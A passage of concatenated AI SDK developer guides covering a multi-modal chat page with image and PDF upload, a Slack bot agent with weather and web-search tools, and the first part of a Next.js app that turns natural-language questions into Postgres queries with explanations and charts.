<div className="flex flex-col w-full max-w-md py-24 mx-auto stretch">
{messages.map(m => (
<div key={m.id} className="whitespace-pre-wrap">
{m.role === 'user' ? 'User: ' : 'AI: '}
{m.parts.map((part, index) => {
if (part.type === 'text') {
return <span key={`${m.id}-text-${index}`}>{part.text}</span>;
}
return null;
})}
</div>
))}
<form
onSubmit={async event => {
event.preventDefault();
sendMessage({
role: 'user',
parts: [{ type: 'text', text: input }],
});
setInput('');
}}
className="fixed bottom-0 w-full max-w-md mb-8 border border-gray-300 rounded shadow-xl"
>
<input
className="w-full p-2"
value={input}
placeholder="Say something..."
onChange={e => setInput(e.target.value)}
/>
</form>
</div>
);
}
This page utilizes the useChat hook, configured with DefaultChatTransport to specify the API endpoint. The useChat hook provides multiple utility functions and state variables:
- messages - the current chat messages (an array of objects with id, role, and parts properties).
- sendMessage - a function to send a new message to the AI.
- Each message contains a parts array that can include text, images, PDFs, and other content types.
- Files are converted to data URLs before being sent to maintain compatibility across different environments.
Add File Upload
To make your agent multi-modal, let's add the ability to upload and send both images and PDFs to the model. In v5, files are sent as part of the message's parts array. Files are converted to data URLs using the FileReader API before being sent to the server.
Update your root page (app/page.tsx) with the following code:
'use client';
import { useChat } from '@ai-sdk/react';
import { DefaultChatTransport } from 'ai';
import { useRef, useState } from 'react';
import Image from 'next/image';
async function convertFilesToDataURLs(files: FileList) {
return Promise.all(
Array.from(files).map(
file =>
new Promise<{
type: 'file';
mediaType: string;
url: string;
}>((resolve, reject) => {
const reader = new FileReader();
reader.onload = () => {
resolve({
type: 'file',
mediaType: file.type,
url: reader.result as string,
});
};
reader.onerror = reject;
reader.readAsDataURL(file);
}),
),
);
}
export default function Chat() {
const [input, setInput] = useState('');
const [files, setFiles] = useState<FileList | undefined>(undefined);
const fileInputRef = useRef<HTMLInputElement>(null);
const { messages, sendMessage } = useChat({
transport: new DefaultChatTransport({
api: '/api/chat',
}),
});
return (
<div className="flex flex-col w-full max-w-md py-24 mx-auto stretch">
{messages.map(m => (
<div key={m.id} className="whitespace-pre-wrap">
{m.role === 'user' ? 'User: ' : 'AI: '}
{m.parts.map((part, index) => {
if (part.type === 'text') {
return <span key={`${m.id}-text-${index}`}>{part.text}</span>;
}
if (part.type === 'file' && part.mediaType?.startsWith('image/')) {
return (
<Image
key={`${m.id}-image-${index}`}
src={part.url}
width={500}
height={500}
alt={`attachment-${index}`}
/>
);
}
if (part.type === 'file' && part.mediaType === 'application/pdf') {
return (
<iframe
key={`${m.id}-pdf-${index}`}
src={part.url}
width={500}
height={600}
title={`pdf-${index}`}
/>
);
}
return null;
})}
</div>
))}
<form
className="fixed bottom-0 w-full max-w-md p-2 mb-8 border border-gray-300 rounded shadow-xl space-y-2"
onSubmit={async event => {
event.preventDefault();
const fileParts =
files && files.length > 0
? await convertFilesToDataURLs(files)
: [];
sendMessage({
role: 'user',
parts: [{ type: 'text', text: input }, ...fileParts],
});
setInput('');
setFiles(undefined);
if (fileInputRef.current) {
fileInputRef.current.value = '';
}
}}
>
<input
type="file"
accept="image/*,application/pdf"
className=""
onChange={event => {
if (event.target.files) {
setFiles(event.target.files);
}
}}
multiple
ref={fileInputRef}
/>
<input
className="w-full p-2"
value={input}
placeholder="Say something..."
onChange={e => setInput(e.target.value)}
/>
</form>
</div>
);
}
In this code, you:
- Add a helper function convertFilesToDataURLs to convert file uploads to data URLs.
- Create state to hold the input text, files, and a ref to the file input field.
- Configure useChat with DefaultChatTransport to specify the API endpoint.
- Display messages using the parts array structure, rendering text, images, and PDFs appropriately.
- Update the onSubmit function to send messages with the sendMessage function, including both text and file parts.
- Add a file input field to the form, including an onChange handler to handle updating the files state.
Running Your Application
With that, you have built everything you need for your multi-modal agent! To start your application, use the command:
<Snippet text={['pnpm run dev']} />
Head to your browser and open http://localhost:3000. You should see an input field and a button to upload files.
Try uploading an image or PDF and asking the model questions about it. Watch as the model's response is streamed back to you!
Using Other Providers
With the AI SDK's unified provider interface, you can easily switch to other providers that support multi-modal capabilities:
// Using Anthropic
const result = streamText({
model: 'anthropic/claude-sonnet-4-20250514',
messages: await convertToModelMessages(messages),
});
// Using Google
const result = streamText({
model: 'google/gemini-2.5-flash',
messages: await convertToModelMessages(messages),
});
Install the provider package (@ai-sdk/anthropic or @ai-sdk/google) and update your API keys in .env.local. The rest of your code remains the same.
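If you prefer provider packages over Gateway model strings, the same handler works with a provider instance. A minimal sketch, assuming @ai-sdk/anthropic is installed:
import { anthropic } from '@ai-sdk/anthropic';
import { convertToModelMessages, streamText, type UIMessage } from 'ai';
export async function POST(req: Request) {
  const { messages }: { messages: UIMessage[] } = await req.json();
  // Identical handler, with a provider instance instead of a model string
  const result = streamText({
    model: anthropic('claude-sonnet-4-20250514'),
    messages: await convertToModelMessages(messages),
  });
  return result.toUIMessageStreamResponse();
}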
Where to Next?
You've built a multi-modal AI agent using the AI SDK! Experiment and extend the functionality of this application further by exploring tool calling.
title: Slackbot Agent Guide
description: Learn how to use the AI SDK to build an AI Agent in Slack.
tags: ['agents', 'chatbot']
Building an AI Agent in Slack with the AI SDK
In this guide, you will learn how to build a Slackbot powered by the AI SDK. The bot will be able to respond to direct messages and mentions in channels using the full context of the thread.
Slack App Setup
Before we start building, you'll need to create and configure a Slack app:
- Go to api.slack.com/apps
- Click "Create New App" and choose "From scratch"
- Give your app a name and select your workspace
- Under "OAuth & Permissions", add the following bot token scopes:
- app_mentions:read
- chat:write
- im:history
- im:write
- assistant:write
- Install the app to your workspace (button under "OAuth Tokens" subsection)
- Copy the Bot User OAuth Token and Signing Secret for the next step
- Under App Home -> Show Tabs -> Chat Tab, check "Allow users to send Slash commands and messages from the chat tab"
Project Setup
This project uses the following stack:
Getting Started
- Clone the repository and check out the starter branch
<Snippet text={[ 'git clone https://github.com/vercel-labs/ai-sdk-slackbot.git', 'cd ai-sdk-slackbot', 'git checkout starter', ]} />
- Install dependencies
<Snippet text={['pnpm install']} />
Project Structure
The starter repository already includes:
- Slack utilities (lib/slack-utils.ts) including functions for validating incoming requests, converting Slack threads to AI SDK compatible message formats, and getting the Slackbot's user ID
- General utility functions (lib/utils.ts) including initial Exa setup
- Files to handle the different types of Slack events (lib/handle-messages.ts and lib/handle-app-mention.ts)
- An API endpoint (POST) for Slack events (api/events.ts)
Event Handler
First, let's take a look at our API route (api/events.ts):
import type { SlackEvent } from '@slack/web-api';
import {
assistantThreadMessage,
handleNewAssistantMessage,
} from '../lib/handle-messages';
import { waitUntil } from '@vercel/functions';
import { handleNewAppMention } from '../lib/handle-app-mention';
import { verifyRequest, getBotId } from '../lib/slack-utils';
export async function POST(request: Request) {
const rawBody = await request.text();
const payload = JSON.parse(rawBody);
const requestType = payload.type as 'url_verification' | 'event_callback';
// See https://api.slack.com/events/url_verification
if (requestType === 'url_verification') {
return new Response(payload.challenge, { status: 200 });
}
await verifyRequest({ requestType, request, rawBody });
try {
const botUserId = await getBotId();
const event = payload.event as SlackEvent;
if (event.type === 'app_mention') {
waitUntil(handleNewAppMention(event, botUserId));
}
if (event.type === 'assistant_thread_started') {
waitUntil(assistantThreadMessage(event));
}
if (
event.type === 'message' &&
!event.subtype &&
event.channel_type === 'im' &&
!event.bot_id &&
!event.bot_profile &&
event.bot_id !== botUserId
) {
waitUntil(handleNewAssistantMessage(event, botUserId));
}
return new Response('Success!', { status: 200 });
} catch (error) {
console.error('Error generating response', error);
return new Response('Error generating response', { status: 500 });
}
}
This file defines a POST function that handles incoming requests from Slack. First, you check the request type to see if it's a URL verification request. If it is, you respond with the challenge string provided by Slack. If it's an event callback, you verify the request and then have access to the event data. This is where you can implement your event handling logic.
You then handle three types of events: app_mention, assistant_thread_started, and message:
- For app_mention, you call handleNewAppMention with the event and the bot user ID.
- For assistant_thread_started, you call assistantThreadMessage with the event.
- For message, you call handleNewAssistantMessage with the event and the bot user ID.
Finally, you respond with a success message to Slack. Note, each handler function is wrapped in a waitUntil function. Let's take a look at what this means and why it's important.
The waitUntil Function
Slack expects a response within 3 seconds to confirm the request is being handled. However, generating AI responses can take longer. If you don't respond to the Slack request within 3 seconds, Slack will send another request, leading to another invocation of your API route, another call to the LLM, and ultimately another response to the user. To solve this, you can use the waitUntil function, which allows you to run your AI logic after the response is sent, without blocking the response itself.
This means, your API endpoint will:
- Immediately respond to Slack (within 3 seconds)
- Continue processing the message asynchronously
- Send the AI response when it's ready
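In code, the pattern looks roughly like this (processEvent is a hypothetical placeholder for the handlers in the starter repo):
import { waitUntil } from '@vercel/functions';
export async function POST(request: Request) {
  const payload = await request.json();
  // Schedule the slow AI work; the runtime keeps the function alive until
  // this promise settles, but the response below is returned immediately.
  waitUntil(processEvent(payload));
  return new Response('Success!', { status: 200 });
}
// Hypothetical: generate the AI response and post it back to Slack here.
async function processEvent(payload: unknown) {}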
Event Handlers
Let's look at how each event type is currently handled.
App Mentions
When a user mentions your bot in a channel, the app_mention event is triggered. The handleNewAppMention function in handle-app-mention.ts processes these mentions:
- Checks if the message is from a bot to avoid infinite response loops
- Creates a status updater to show the bot is "thinking"
- If the mention is in a thread, it retrieves the thread history
- Calls the LLM with the message content (using the generateResponse function which you will implement in the next section)
- Updates the initial "thinking" message with the AI response
Here's the code for the handleNewAppMention function:
import { AppMentionEvent } from '@slack/web-api';
import { client, getThread } from './slack-utils';
import { generateResponse } from './ai';
const updateStatusUtil = async (
initialStatus: string,
event: AppMentionEvent,
) => {
const initialMessage = await client.chat.postMessage({
channel: event.channel,
thread_ts: event.thread_ts ?? event.ts,
text: initialStatus,
});
if (!initialMessage || !initialMessage.ts)
throw new Error('Failed to post initial message');
const updateMessage = async (status: string) => {
await client.chat.update({
channel: event.channel,
ts: initialMessage.ts as string,
text: status,
});
};
return updateMessage;
};
export async function handleNewAppMention(
event: AppMentionEvent,
botUserId: string,
) {
console.log('Handling app mention');
if (event.bot_id || event.bot_id === botUserId || event.bot_profile) {
console.log('Skipping app mention');
return;
}
const { thread_ts, channel } = event;
const updateMessage = await updateStatusUtil('is thinking...', event);
if (thread_ts) {
const messages = await getThread(channel, thread_ts, botUserId);
const result = await generateResponse(messages, updateMessage);
updateMessage(result);
} else {
const result = await generateResponse(
[{ role: 'user', content: event.text }],
updateMessage,
);
updateMessage(result);
}
}
Now let's see how new assistant threads and messages are handled.
Assistant Thread Messages
When a user starts a thread with your assistant, the assistant_thread_started event is triggered. The assistantThreadMessage function in handle-messages.ts handles this:
- Posts a welcome message to the thread
- Sets up suggested prompts to help users get started
Here's the code for the assistantThreadMessage function:
import type { AssistantThreadStartedEvent } from '@slack/web-api';
import { client } from './slack-utils';
export async function assistantThreadMessage(
event: AssistantThreadStartedEvent,
) {
const { channel_id, thread_ts } = event.assistant_thread;
console.log(`Thread started: ${channel_id} ${thread_ts}`);
console.log(JSON.stringify(event));
await client.chat.postMessage({
channel: channel_id,
thread_ts: thread_ts,
text: "Hello, I'm an AI assistant built with the AI SDK by Vercel!",
});
await client.assistant.threads.setSuggestedPrompts({
channel_id: channel_id,
thread_ts: thread_ts,
prompts: [
{
title: 'Get the weather',
message: 'What is the current weather in London?',
},
{
title: 'Get the news',
message: 'What is the latest Premier League news from the BBC?',
},
],
});
}
Direct Messages
For direct messages to your bot, the message event is triggered and the event is handled by the handleNewAssistantMessage function in handle-messages.ts:
- Verifies the message isn't from a bot
- Updates the status to show the response is being generated
- Retrieves the conversation history
- Calls the LLM with the conversation context
- Posts the LLM's response to the thread
Here's the code for the handleNewAssistantMessage function:
import type { GenericMessageEvent } from '@slack/web-api';
import { client, getThread, updateStatusUtil } from './slack-utils';
import { generateResponse } from './ai';
export async function handleNewAssistantMessage(
event: GenericMessageEvent,
botUserId: string,
) {
if (
event.bot_id ||
event.bot_id === botUserId ||
event.bot_profile ||
!event.thread_ts
)
return;
const { thread_ts, channel } = event;
const updateStatus = updateStatusUtil(channel, thread_ts);
updateStatus('is thinking...');
const messages = await getThread(channel, thread_ts, botUserId);
const result = await generateResponse(messages, updateStatus);
await client.chat.postMessage({
channel: channel,
thread_ts: thread_ts,
text: result,
unfurl_links: false,
blocks: [
{
type: 'section',
text: {
type: 'mrkdwn',
text: result,
},
},
],
});
updateStatus('');
}
With the event handlers in place, let's now implement the AI logic.
Implementing AI Logic
The core of our application is the generateResponse function in lib/ai.ts (imported above as './ai'), which processes messages and generates responses using the AI SDK.
Here's how to implement it:
import { generateText, ModelMessage } from 'ai';
__PROVIDER_IMPORT__;
export const generateResponse = async (
messages: ModelMessage[],
updateStatus?: (status: string) => void,
) => {
const { text } = await generateText({
model: __MODEL__,
system: `You are a Slack bot assistant. Keep your responses concise and to the point.
- Do not tag users.
- Current date is: ${new Date().toISOString().split('T')[0]}`,
messages,
});
// Convert markdown to Slack mrkdwn format
return text.replace(/\[(.*?)\]\((.*?)\)/g, '<$2|$1>').replace(/\*\*/g, '*');
};
This basic implementation:
- Uses the AI SDK's generateText function to call Anthropic's claude-sonnet-4.5 model
- Provides a system prompt to guide the model's behavior
- Formats the response for Slack's markdown format
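To illustrate the last point, the two replace calls rewrite markdown links and bold markers into Slack's mrkdwn syntax:
const markdown = 'See **the docs** at [AI SDK](https://ai-sdk.dev)';
const mrkdwn = markdown
  .replace(/\[(.*?)\]\((.*?)\)/g, '<$2|$1>')
  .replace(/\*\*/g, '*');
console.log(mrkdwn); // See *the docs* at <https://ai-sdk.dev|AI SDK>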
Enhancing with Tools
The real power of the AI SDK comes from tools that enable your bot to perform actions. Let's add two useful tools:
import { generateText, tool, ModelMessage, stepCountIs } from 'ai';
__PROVIDER_IMPORT__;
import { z } from 'zod';
import { exa } from './utils';
export const generateResponse = async (
messages: ModelMessage[],
updateStatus?: (status: string) => void,
) => {
const { text } = await generateText({
model: __MODEL__,
system: `You are a Slack bot assistant. Keep your responses concise and to the point.
- Do not tag users.
- Current date is: ${new Date().toISOString().split('T')[0]}
- Always include sources in your final response if you use web search.`,
messages,
stopWhen: stepCountIs(10),
tools: {
getWeather: tool({
description: 'Get the current weather at a location',
inputSchema: z.object({
latitude: z.number(),
longitude: z.number(),
city: z.string(),
}),
execute: async ({ latitude, longitude, city }) => {
updateStatus?.(`is getting weather for ${city}...`);
const response = await fetch(
`https://api.open-meteo.com/v1/forecast?latitude=${latitude}&longitude=${longitude}&current=temperature_2m,weathercode,relativehumidity_2m&timezone=auto`,
);
const weatherData = await response.json();
return {
temperature: weatherData.current.temperature_2m,
weatherCode: weatherData.current.weathercode,
humidity: weatherData.current.relativehumidity_2m,
city,
};
},
}),
searchWeb: tool({
description: 'Use this to search the web for information',
inputSchema: z.object({
query: z.string(),
specificDomain: z
.string()
.nullable()
.describe(
'a domain to search if the user specifies e.g. bbc.com. Should be only the domain name without the protocol',
),
}),
execute: async ({ query, specificDomain }) => {
updateStatus?.(`is searching the web for ${query}...`);
const { results } = await exa.searchAndContents(query, {
livecrawl: 'always',
numResults: 3,
includeDomains: specificDomain ? [specificDomain] : undefined,
});
return {
results: results.map(result => ({
title: result.title,
url: result.url,
snippet: result.text.slice(0, 1000),
})),
};
},
}),
},
});
// Convert markdown to Slack mrkdwn format
return text.replace(/\[(.*?)\]\((.*?)\)/g, '<$2|$1>').replace(/\*\*/g, '*');
};
In this updated implementation:
- You added two tools:
  - getWeather: fetches weather data for a specified location
  - searchWeb: searches the web for information using the Exa API
- You set stopWhen: stepCountIs(10) to enable multi-step conversations. This defines the stopping conditions of your agent when the model generates a tool call. The AI SDK will automatically send tool results back to the LLM to trigger additional tool calls or responses as the LLM deems necessary. This turns your LLM call from a one-off operation into a multi-step agentic flow.
How It Works
When a user interacts with your bot:
- The Slack event is received and processed by your API endpoint
- The user's message and the thread history are passed to the generateResponse function
- The AI SDK processes the message and may invoke tools as needed
- The response is formatted for Slack and sent back to the user
The tools are automatically invoked based on the user's intent. For example, if a user asks "What's the weather in London?", the AI will:
- Recognize this as a weather query
- Call the getWeather tool with London's coordinates (inferred by the LLM)
- Process the weather data
- Generate a final response, answering the user's question
Deploying the App
- Install the Vercel CLI
<Snippet text={['pnpm install -g vercel']} />
- Deploy the app
<Snippet text={['vercel deploy']} />
- Copy the deployment URL and update the Slack app's Event Subscriptions to point to your Vercel URL
- Go to your project's deployment settings (Your project -> Settings -> Environment Variables) and add your environment variables
SLACK_BOT_TOKEN=your_slack_bot_token
SLACK_SIGNING_SECRET=your_slack_signing_secret
OPENAI_API_KEY=your_openai_api_key
EXA_API_KEY=your_exa_api_key
- Head back to https://api.slack.com/ and navigate to the "Event Subscriptions" page. Enable events and add your deployment URL.
https://your-vercel-url.vercel.app/api/events
- On the Events Subscription page, subscribe to the following events:
  - app_mention
  - assistant_thread_started
  - message:im
Finally, head to Slack and test the app by sending a message to the bot.
Next Steps
You've built a Slack chatbot powered by the AI SDK! Here are some ways you could extend it:
- Add memory for specific users to give the LLM context of previous interactions
- Implement more tools like database queries or knowledge base searches
- Add support for rich message formatting with blocks
- Add analytics to track usage patterns
title: Natural Language Postgres
description: Learn how to build a Next.js app that lets you talk to a PostgreSQL database in natural language.
tags: ['agents', 'next', 'tools']
Natural Language Postgres Guide
In this guide, you will learn how to build an app that uses AI to interact with a PostgreSQL database using natural language.
The application will:
- Generate SQL queries from a natural language input
- Explain query components in plain English
- Create a chart to visualize query results
You can find a completed version of this project at natural-language-postgres.vercel.app.
Project setup
This project uses the following stack:
- Next.js (App Router)
- AI SDK
- OpenAI
- Zod
- Postgres with Vercel Postgres
- shadcn-ui and TailwindCSS for styling
- Recharts for data visualization
Clone repo
To focus on the AI-powered functionality rather than project setup and configuration, we've prepared a starter repository which includes a database schema and a few components.
Clone the starter repository and check out the starter branch:
<Snippet text={[ 'git clone https://github.com/vercel-labs/natural-language-postgres', 'cd natural-language-postgres', 'git checkout starter', ]} />
Project setup and data
Let's set up the project and seed the database with the dataset:
- Install dependencies:
<Snippet text={['pnpm install']} />
- Copy the example environment variables file:
<Snippet text={['cp .env.example .env']} />
- Add your environment variables to .env:
OPENAI_API_KEY="your_api_key_here"
POSTGRES_URL="..."
POSTGRES_PRISMA_URL="..."
POSTGRES_URL_NO_SSL="..."
POSTGRES_URL_NON_POOLING="..."
POSTGRES_USER="..."
POSTGRES_HOST="..."
POSTGRES_PASSWORD="..."
POSTGRES_DATABASE="..."
- This project uses CB Insights' Unicorn Companies dataset. You can download the dataset by following these instructions:
- Navigate to CB Insights Unicorn Companies
- Enter your email. You will receive a link to download the dataset.
- Save it as unicorns.csv in your project root
Setting up Postgres with Vercel
To set up a Postgres instance on your Vercel account:
- Go to Vercel.com and make sure you're logged in
- Navigate to your team homepage
- Click on the Integrations tab
- Click Browse Marketplace
- Look for the Storage option in the sidebar
- Select the Neon option (recommended, but any other PostgreSQL database provider should work)
- Click Install, then click Install again in the top right corner
- On the "Get Started with Neon" page, click Create Database on the right
- Select your region (e.g., Washington, D.C., U.S. East)
- Turn off Auth
- Click Continue
- Name your database (you can use the default name or rename it to something like "NaturalLanguagePostgres")
- Click Create in the bottom right corner
- After seeing "Database created successfully", click Done
- You'll be redirected to your database instance
- In the Quick Start section, click Show secrets
- Copy the full DATABASE_URL environment variable and use it to populate the Postgres environment variables in your .env file
About the dataset
The Unicorn List dataset contains the following information about unicorn startups (companies with a valuation above $1bn):
- Company name
- Valuation
- Date joined (unicorn status)
- Country
- City
- Industry
- Select investors
This dataset contains over 1,000 rows of data across 7 columns, giving us plenty of structured data to analyze. This makes it perfect for exploring various SQL queries that can reveal interesting insights about the unicorn startup ecosystem.
- Now that you have the dataset downloaded and added to your project, you can initialize the database with the following command:
<Snippet text={['pnpm run seed']} />
Note: this step can take a little while. You should see a message indicating the Unicorns table has been created and then that the database has been seeded successfully.
- Start the development server:
<Snippet text={['pnpm run dev']} />
Your application should now be running at http://localhost:3000.
Project structure
The starter repository already includes everything that you will need, including:
- Database seed script (lib/seed.ts)
- Basic components built with shadcn/ui (components/)
- Function to run SQL queries (app/actions.ts)
- Type definitions for the database schema (lib/types.ts)
Existing components
The application contains a single page in app/page.tsx that serves as the main interface.
At the top, you'll find a header (header.tsx) displaying the application title and description. Below that is an input field and search button (search.tsx) where you can enter natural language queries.
Initially, the page shows a collection of suggested example queries (suggested-queries.tsx) that you can click to quickly try out the functionality.
When you submit a query:
- The suggested queries section disappears and a loading state appears
- Once complete, a card appears with "TODO - IMPLEMENT ABOVE" (
query-viewer.tsx) which will eventually show your generated SQL - Below that is an empty results area with "No results found" (
results.tsx)
After you implement the core functionality:
- The results section will display data in a table format
- A toggle button will allow switching between table and chart views
- The chart view will visualize your query results
Let's implement the AI-powered functionality to bring it all together.
Building the application
As a reminder, this application will have three main features:
- Generate SQL queries from natural language
- Create a chart from the query results
- Explain SQL queries in plain English
For each of these features, you'll use the AI SDK via Server Actions to interact with OpenAI's GPT-4o and GPT-4o-mini models. Server Actions are a powerful React Server Component feature that allows you to call server-side functions directly from your frontend code.
Let's start with generating a SQL query from natural language.
Generate SQL queries
Providing context
For the model to generate accurate SQL queries, it needs context about your database schema, tables, and relationships. You will communicate this information through a prompt that should include:
- Schema information
- Example data formats
- Available SQL operations
- Best practices for query structure
- Nuanced advice for specific fields
Let's write a prompt that includes all of this information:
You are a SQL (postgres) and data visualization expert. Your job is to help the user write a SQL query to retrieve the data they need. The table schema is as follows:
unicorns (
id SERIAL PRIMARY KEY,
company VARCHAR(255) NOT NULL UNIQUE,
valuation DECIMAL(10, 2) NOT NULL,
date_joined DATE,
country VARCHAR(255) NOT NULL,
city VARCHAR(255) NOT NULL,
industry VARCHAR(255) NOT NULL,
select_investors TEXT NOT NULL
);
Only retrieval queries are allowed.
For things like industry, company names and other string fields, use the ILIKE operator and convert both the search term and the field to lowercase using LOWER() function. For example: LOWER(industry) ILIKE LOWER('%search_term%').
Note: select_investors is a comma-separated list of investors. Trim whitespace to ensure you're grouping properly. Note, some fields may be null or have only one value.
When answering questions about a specific field, ensure you are selecting the identifying column (e.g. "what is Vercel's valuation" would select company and valuation).
The industries available are:
- healthcare & life sciences
- consumer & retail
- financial services
- enterprise tech
- insurance
- media & entertainment
- industrials
- health
If the user asks for a category that is not in the list, infer based on the list above.
Note: valuation is in billions of dollars so 10b would be 10.0.
Note: if the user asks for a rate, return it as a decimal. For example, 0.1 would be 10%.
If the user asks for 'over time' data, return by year.
When searching for UK or USA, write out United Kingdom or United States respectively.
EVERY QUERY SHOULD RETURN QUANTITATIVE DATA THAT CAN BE PLOTTED ON A CHART! There should always be at least two columns. If the user asks for a single column, return the column and the count of the column. If the user asks for a rate, return the rate as a decimal. For example, 0.1 would be 10%.
There are several important elements of this prompt:
- Schema description helps the model understand exactly what data fields to work with
- Includes rules for handling queries based on common SQL patterns - for example, always using ILIKE for case-insensitive string matching
- Explains how to handle edge cases in the dataset, like dealing with the comma-separated investors field and ensuring whitespace is properly handled
- Instead of having the model guess at industry categories, it provides the exact list that exists in the data, helping avoid mismatches
- The prompt helps standardize data transformations - like knowing to interpret "10b" as "10.0" billion dollars, or that rates should be decimal values
- Clear rules ensure the query output will be chart-friendly by always including at least two columns of data that can be plotted
This prompt structure provides a strong foundation for query generation, but you should experiment and iterate based on your specific needs and the model you're using.
Create a Server Action
With the prompt done, let's create a Server Action.
Open app/actions.ts. You should see one action already defined (runGeneratedSQLQuery).
Add a new action. This action should be asynchronous and take in one parameter - the natural language query.
/* ...rest of the file... */
export const generateQuery = async (input: string) => {};
In this action, you'll use the generateText function with Output from the AI SDK which allows you to constrain the model's output to a pre-defined schema. This process, sometimes called structured output, ensures the model returns only the SQL query without any additional prefixes, explanations, or formatting that would require manual parsing.
/* ...other imports... */
import { generateText, Output } from 'ai';
import { z } from 'zod';
/* ...rest of the file... */
export const generateQuery = async (input: string) => {
'use server';
try {
const result = await generateText({
model: 'openai/gpt-4o',
system: `You are a SQL (postgres) ...`, // SYSTEM PROMPT AS ABOVE - OMITTED FOR BREVITY
prompt: `Generate the query necessary to retrieve the data the user wants: ${input}`,
output: Output.object({
schema: z.object({
query: z.string(),
}),
}),
});
return result.output.query;
} catch (e) {
console.error(e);
throw new Error('Failed to generate query');
}
};
Note, you are constraining the output to a single string field called query using Zod, a TypeScript schema validation library. This ensures the model returns only the SQL query itself, which is then returned from the action.
Update the frontend
With the Server Action in place, you can now update the frontend to call this action when the user submits a natural language query. In the root page (app/page.tsx), you should see a handleSubmit function that is called when the user submits a query.
Import the generateQuery function and call it with the user's input.
/* ...other imports... */
import { runGeneratedSQLQuery, generateQuery } from './actions';
/* ...rest of the file... */
const handleSubmit = async (suggestion?: string) => {
clearExistingData();
const question = suggestion ?? inputValue;
if (inputValue.length === 0 && !suggestion) return;
if (question.trim()) {
setSubmitted(true);
}
setLoading(true);
setLoadingStep(1);
setActiveQuery('');
try {
const query = await generateQuery(question);
if (query === undefined) {
toast.error('An error occurred. Please try again.');
setLoading(false);
return;
}
setActiveQuery(query);
setLoadingStep(2);
const companies = await runGeneratedSQLQuery(query);
const columns = companies.length > 0 ? Object.keys(companies[0]) : [];
setResults(companies);
setColumns(columns);
setLoading(false);
} catch (e) {
toast.error('An error occurred. Please try again.');
setLoading(false);
}
};
/* ...rest of the file... */
Now, when the user submits a natural language query (e.g. "how many unicorns are from San Francisco?"), that question will be sent to your newly created Server Action. The Server Action will call the model, passing in your system prompt and the user's query, and return the generated SQL query in a structured format. This query is then passed to the runGeneratedSQLQuery action to run against your database. The results are then saved in local state and displayed to the user.
Save the file, make sure the dev server is running, and head to localhost:3000 in your browser. Try submitting a natural language query. You should see the generated SQL query displayed under the input field and the results of the query displayed in a table below it.
Try clicking the SQL query to see the full query if it's too long to display in the input field. You should see a button on the right side of the input field with a question mark icon. Clicking this button currently does nothing, but you'll add the "explain query" functionality to it in the next step.
Explain SQL Queries
Next, let's add the ability to explain SQL queries in plain English. This feature helps users understand how the generated SQL query works by breaking it down into logical sections. As with the SQL query generation, you'll need a prompt to guide the model when explaining queries.
Let's craft a prompt for the explain query functionality:
You are a SQL (postgres) expert. Your job is to explain to the user the SQL query you wrote to retrieve the data they asked for. The table schema is as follows:
unicorns (
id SERIAL PRIMARY KEY,
company VARCHAR(255) NOT NULL UNIQUE,
valuation DECIMAL(10, 2) NOT NULL,
date_joined DATE,
country VARCHAR(255) NOT NULL,
city VARCHAR(255) NOT NULL,
industry VARCHAR(255) NOT NULL,
select_investors TEXT NOT NULL
);
When you explain you must take a section of the query, and then explain it. Each "section" should be unique. So in a query like: "SELECT * FROM unicorns limit 20", the sections could be "SELECT *", "FROM UNICORNS", "LIMIT 20".
If a section doesn't have any explanation, include it, but leave the explanation empty.
Like the prompt for generating SQL queries, you provide the model with the schema of the database. Additionally, you provide an example of what each section of the query might look like. This helps the model understand the structure of the query and how to break it down into logical sections.
Create a Server Action
Add a new Server Action to generate explanations for SQL queries.
This action takes two parameters - the original natural language input and the generated SQL query.
/* ...rest of the file... */
export const explainQuery = async (input: string, sqlQuery: string) => {
'use server';
try {
const result = await generateText({
model: 'openai/gpt-4o',
system: `You are a SQL (postgres) expert. ...`, // SYSTEM PROMPT AS ABOVE - OMITTED FOR BREVITY
prompt: `Explain the SQL query you generated to retrieve the data the user wanted. Assume the user is not an expert in SQL. Break down the query into steps. Be concise.
User Query:
${input}
Generated SQL Query:
${sqlQuery}`,
});
return result.text;
} catch (e) {
console.error(e);
throw new Error('Failed to generate query');
}
};
This action uses the generateText function. However, you haven't defined the output schema yet. Let's define it in another file so it can also be used as a type in your components.
Update your lib/types.ts file to include the schema for the explanations:
import { z } from 'zod';
/* ...rest of the file... */
export const explanationSchema = z.object({
section: z.string(),
explanation: z.string(),
});
export type QueryExplanation = z.infer<typeof explanationSchema>;
This schema defines the structure of the explanation that the model will generate. Each explanation will have a section and an explanation. The section is the part of the query being explained, and the explanation is the plain English explanation of that section. Go back to your actions.ts file and import and use the explanationSchema:
// other imports
import { explanationSchema } from '@/lib/types';
/* ...rest of the file... */
export const explainQuery = async (input: string, sqlQuery: string) => {
'use server';
try {
const result = await generateText({
model: 'openai/gpt-4o',
system: `You are a SQL (postgres) expert. ...`, // SYSTEM PROMPT AS ABOVE - OMITTED FOR BREVITY
prompt: `Explain the SQL query you generated to retrieve the data the user wanted. Assume the user is not an expert in SQL. Break down the query into steps. Be concise.
User Query:
${input}
Generated SQL Query:
${sqlQuery}`,
output: Output.array({ element: explanationSchema }),
});
return result.output;
} catch (e) {
console.error(e);
throw new Error('Failed to generate query');
}
};
Update query viewer
Next, update the query-viewer.tsx component to display these explanations. The handleExplainQuery function is called every time the user clicks the question icon button on the right side of the query. Let's update this function to use the new explainQuery action:
/* ...other imports... */
import { explainQuery } from '@/app/actions';
/* ...rest of the component... */
const handleExplainQuery = async () => {
setQueryExpanded(true);
setLoadingExplanation(true);
const explanations = await explainQuery(inputValue, activeQuery);
setQueryExplanations(explanations);
setLoadingExplanation(false);
};
/* ...rest of the component... */
Now when users click the explanation button (the question mark icon), the component will:
- Show a loading state
- Send the active SQL query and the user's natural language query to your Server Action
- The model will generate an array of explanations
- The explanations will be set in the component state and rendered in the UI
Submit a new query and then click the explanation button. Hover over different elements of the query. You should see the explanations for each section!
Visualizing query results
Finally, let's render the query results visually in a chart. There are two approaches you could take:
- Send both the query and data to the model and ask it to return the data in a visualization-ready format. While this provides complete control over the visualization, it requires the model to send back all of the data, which significantly increases latency and costs.
- Send the query and data to the model and ask it to generate a chart configuration (fixed-size and token-efficient) that maps your data appropriately. This configuration specifies how to visualize the information while delivering the insights from your natural language query. Importantly, this is done without requiring the model to return the full dataset.
Since you don't know the SQL query or data shape beforehand, let's use the second approach to dynamically generate chart configurations based on the query results and user intent.
Generate the chart configuration
For this feature, you'll create a Server Action that takes the query results and the user's original natural language query to determine the best visualization approach. Your application is already set up to use shadcn charts (which uses Recharts under the hood) so the model will need to generate:
- Chart type (bar, line, area, or pie)
- Axis mappings
- Visual styling
